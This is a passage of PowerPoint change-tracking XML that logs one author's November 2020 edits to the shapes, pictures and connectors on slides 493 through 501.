        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:23:43.597" v="4983"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4012509717" sldId="493"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:20:24.154" v="4911" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4012509717" sldId="493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0T16:26:12.889" v="2414" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4012509717" sldId="493"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:23:38.781" v="4980" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4012509717" sldId="493"/>
            <ac:spMk id="20" creationId="{275CFC23-3B7E-48A3-BDA7-5E4F5D4A9F4D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:23:41.250" v="4982" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4012509717" sldId="493"/>
            <ac:picMk id="1026" creationId="{5718AAE0-4ADE-48F4-8044-30F1FAEFD01A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modAnim modNotes modNotesTx">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-13T05:23:20.610" v="6251" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3244327451" sldId="494"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:19:11.926" v="2708"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244327451" sldId="494"/>
            <ac:spMk id="2" creationId="{D539903F-8F05-42C3-8144-800CFD37FC50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:20:16.310" v="2737" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244327451" sldId="494"/>
            <ac:spMk id="3" creationId="{9C7C9DDB-4D62-443B-8F3A-6ECEABB80FC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:14:10.147" v="4716" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244327451" sldId="494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6:42:38.086" v="5206" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244327451" sldId="494"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:14:14.688" v="4717" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244327451" sldId="494"/>
            <ac:picMk id="5" creationId="{13EF3D2C-FAB6-48BC-BCC3-BA01D3E642A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:24:41.530" v="5012" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3577163895" sldId="495"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:24:41.530" v="5012" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3577163895" sldId="495"/>
            <ac:spMk id="2" creationId="{34F5D4E1-C1BE-4919-804B-2E81500D9764}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:23:57.281" v="4992" actId="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3577163895" sldId="495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0T16:26:23.132" v="2418" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3577163895" sldId="495"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:44:18.600" v="5210" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789588912" sldId="496"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:28:11.553" v="5052" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:28:11.553" v="5052" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:28:11.553" v="5052" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:29:51.969" v="5093" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="9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0.050" v="1170" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="10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4.032" v="1173" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="11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2.922" v="1172" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="12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13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14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15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16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17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:29:48.087" v="5091" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:33:15.329" v="1174" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="59" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:33:18.794" v="1175" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="60" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:44:18.600" v="5210" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:spMk id="61" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:30:09.263" v="1084" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:picMk id="3" creationId="{E8F92DA6-B930-4F15-8957-88DD14C63489}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:29:33.137" v="1079" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2789588912" sldId="496"/>
            <ac:picMk id="1026" creationId="{65E30010-F1F4-4F2C-9EAE-3DD5102BCD11}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod setBg modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:45:11.433" v="5228" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="389449445" sldId="497"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:45:05.608" v="5217" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="389449445" sldId="497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2T06:45:11.433" v="5228" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="389449445" sldId="497"/>
            <ac:picMk id="3" creationId="{64A33B13-2D11-487A-B0EB-A3662DA0DD65}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:45:10.094" v="5225" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="389449445" sldId="497"/>
            <ac:picMk id="5" creationId="{27BA5EFA-59D6-460F-9445-B6D24A9BABA6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T08:42:14.405" v="1206" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2326710665" sldId="497"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:53:44.622" v="5483" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1603141354" sldId="498"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:53:44.622" v="5483" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1603141354" sldId="498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6:46:05.839" v="5229" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1603141354" sldId="498"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:31:47.814" v="5128" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1603141354" sldId="498"/>
            <ac:spMk id="20" creationId="{62827428-DBFD-4E85-87BA-28A76B3599B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:13.999" v="5230" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="434467859" sldId="499"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:08:23.495" v="1484" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:spMk id="4" creationId="{25F80381-50EE-41A5-9F9D-00B42A990ACA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:08:37.314" v="1487" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:spMk id="5" creationId="{9A7364C6-D40D-42EF-A766-8EB9827F6491}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:08:54.171" v="1490" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:spMk id="6" creationId="{7A0BDCFC-02DB-4F53-A6D1-ECE270D31163}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:09:06.538" v="1493" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:spMk id="7" creationId="{F63DE1CE-CE0D-4A06-82A9-F90ED7CB9694}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:09:20.433" v="1496" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:spMk id="8" creationId="{8197EA25-1B52-492A-8578-71F51276B572}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:13.999" v="5230" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499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0T09:07:36.882" v="1481" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="434467859" sldId="499"/>
            <ac:picMk id="3" creationId="{61CA3DE0-5C4B-4439-A28C-0559C35983B0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:21.543" v="5231" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="455854314" sldId="500"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="2" creationId="{5D81C3B1-23E4-4B6F-BE58-0CCF70093821}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="3" creationId="{F153426A-0D03-4796-9F40-F84ABEEA20FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:46:52.546" v="1630" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="4" creationId="{6D48A311-8A11-4DD7-9A07-21F88543FBF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:32:23.790" v="5134" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="4" creationId="{C633A615-6D60-4D8F-9AE3-4D4C420918A3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="5" creationId="{6E8CF330-17B3-44B1-9F5F-05BA99DF8416}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:46:55.296" v="1631" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="6" creationId="{1B980E26-AA08-4949-B386-E968EC8BAA3C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T09:46:57.282" v="1632" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="7" creationId="{3053FD24-8314-4D0D-BF3F-056DFD37C991}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:33:23.838" v="5151" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="7" creationId="{5BE9DF5D-BA3C-4233-9ED2-BFB2BB015FBC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:33:35.957" v="5161" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="8" creationId="{6849A292-4E85-492B-9788-473AC7EB41E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="10" creationId="{43AB6539-8704-4BB8-94CB-EF99C4EB1624}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="11" creationId="{CDD71A13-9658-4CB3-80BF-04A833EA5CCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:21.543" v="5231" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T10:46:01.552" v="1670" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:picMk id="9" creationId="{83DDC6A6-B935-43BF-8A48-81A662E22C77}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:cxnSpMk id="6" creationId="{9F2884AB-E1CF-4DB4-A273-1D3E63D1C275}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:cxnSpMk id="15" creationId="{51A3C2B5-9BFD-48C7-8BCE-F67F5EE8CFC2}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:cxnSpMk id="18" creationId="{D0D1413D-5A7B-40B4-B064-39FE6E25191B}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:28:55.151" v="3016" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455854314" sldId="500"/>
            <ac:cxnSpMk id="19" creationId="{376A0B05-5EF3-48F5-8C9E-E3BB4E60E5DA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg delAnim modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:46:37.697" v="5242" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="222881260" sldId="501"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T10:52:54.711" v="1710" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="4" creationId="{1A594C8D-6371-4F83-8926-8A64D575B37C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:48.061" v="5165" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="5" creationId="{E776DB60-F25F-4F09-9F7B-E43E78000207}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:55.259" v="5171" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="6" creationId="{2D58C13C-E87F-499B-9E42-30F14FAC0C37}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:48.062" v="5167"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="7" creationId="{AD496EAE-2EA3-4312-840B-FEA70BD54554}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T10:52:34.868" v="1679" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="9" creationId="{59A38D5C-3B7E-4363-9696-7139FA536B8D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:49.202" v="5168" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:spMk id="11" creationId="{0B5B3548-5E9E-472C-8CF9-F1C6A600C5AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
